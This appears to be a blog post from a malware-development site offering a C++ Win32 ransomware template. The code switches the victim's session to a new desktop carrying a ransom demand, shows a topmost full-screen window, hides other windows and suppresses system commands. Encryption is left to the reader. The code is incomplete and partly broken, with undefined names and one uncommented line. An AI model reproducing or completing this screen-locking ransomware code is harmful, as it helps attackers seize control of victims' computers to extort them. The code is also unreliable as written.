Skip to content

Malware University

Class is in Session

  • About
    • Privacy Policy
  • Contact
  • Resources

Generic Win32 Ransomware Template

Posted on December 20, 2020 - December 20, 2020 by admin

The following is a basic (C++) program to build out Win32 ransomware projects. It will let you “control” a Windows session’s terminal/screen. The file encrypting, transporting, ransoming, destruction, etc, is left as an exercise to the reader.

#include <Windows.h>
#include <WinGDI.h>

void CreateWndContent0(HWND parent)
{
	HWND wnd;
	wnd = CreateWindowExW(NULL, L"BTN", L"btn", 0x50012F00, 50, 100, 200, 100, parent, (HMENU) IDC_BUTTON0, instance, NULL);
	SendMessage(wnd, WM_SETFONT, (WPARAM) h_font, TRUE);
}

LRESULT CALLBACK WndProc0(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam)
{
	switch (msg)
	{
		case WM_CREATE:
			CreateWndContent0(hwnd);
			break;

		case WM_COMMAND:
			switch (LOWORD(wparam))
			{
				case IDC_BUTTON0:
					MessageBoxW(hwnd, L"BTN is clicked.", L"Event", MB_OK | MB_ICONINFORMATION);
					SendMessageW(hwnd, WM_DESTROY, NULL, false);
					break;
			}
			break;

		case WM_SYSCOMMAND:
			return true;
			break;

		case WM_DESTROY:
			PostQuitMessage(0);
			break;
	
		default:
			return DefWindowProc(hwnd, msg, wparam, lparam);
	}
	return FALSE;
}

HWND CreateWnd0()
{
	HWND wnd;
	wnd = CreateWindowExW(NULL, WND_CLASS_NAME0, L"window", WS_POPUP, 0, 0, 1920, 1080, NULL, NULL, instance, NULL);
 // Get screen size dynamically for the win
	hWindow0 = wnd;
	SetWindowPos(wnd, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOMOVE | SWP_NOSIZE | SWP_SHOWWINDOW);
	ShowWindow(wnd, SW_SHOWNORMAL);
	UpdateWindow(wnd);
	return wnd;
}	

DWORD WINAPI Window0Thread( LPVOID param )
{
	SetThreadDesktop(hDesktop); // New desktop where further windows created
	RegisterClasses(WndProc0, WND_CLASS_NAME0);
	CreateWnd0();
	MessageLoop();
	ExitThread(0);
}

namespace Window
{
	bool CALLBACK HideWindowProc(HWND hwnd, LPARAM lParam)
	{
		if(GetAncestor(hwnd, 3) == hWindow0)
			return true;
		ShowWindow(hwnd, SW_HIDE);
		return true;
	}

	bool Init(HINSTANCE hInstance)
	{
		instance = hInstance;
		InitCommonControls();
		h_font = CreateFontW(-13, 0, 0, 0, FW_NORMAL, 0,
				0, 0, ANSI_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS,
				DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"Times New Roman");

		hWinsta = GetProcessWindowStation();
		SetProcessWindowStation(hWinsta);
		hDesktop = CreateDesktopW(L"Our ransomware message, give us all the bitcoins!", 0, 0, 0, GENERIC_ALL, NULL);
		hOldDesktop = GetThreadDesktop(GetCurrentThreadId());
		SetThreadDesktop(hDesktop); // All windows created under this desktop.
		SwitchDesktop(hDesktop); // Take control of what the user sees. Show them the message.
		
		hThreadWindow0 = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) &Window0Thread, 0, 0, 0);
		return true;
	}

	void DeInit()
	{
		SwitchDesktop(hOldDesktop); // Restore the old, original, desktop.
 Because you're a nice boy ;)
		CloseDesktop(hDesktop);
		CloseWindowStation(hWinsta);
	}
}
Posted in Malware DevelopmentTagged c++, ransomeware, template, win32

Post navigation

Mexican Cartels Deploying Lawful Intercept Software
7zip Password Cracker (BASH)

Leave a Reply Cancel reply

You must be logged in to post a comment.

Recent Posts

  • Manual Scraping
  • Nitter Replacement
  • MFA Abuse in Splunk
  • Virtualbox Automation
  • Repository Poisoning

Recent Comments

    Archives

    • August 2024
    • July 2023
    • August 2022
    • March 2022
    • November 2021
    • October 2021
    • September 2021
    • August 2021
    • July 2021
    • June 2021
    • February 2021
    • December 2020
    • October 2020
    • September 2020
    • April 2020
    • March 2020
    • January 2020
    • July 2019
    • June 2019

    Categories

    • Campaign Analysis
    • Campaign Management
    • Code Analysis
    • Current Events
    • Malware Development
    • Techniques
    • Uncategorized
    • Utilities

    Meta

    • Log in
    • Entries feed
    • Comments feed
    • WordPress.org
    Proudly powered by WordPress | Theme: micro, developed by DevriX.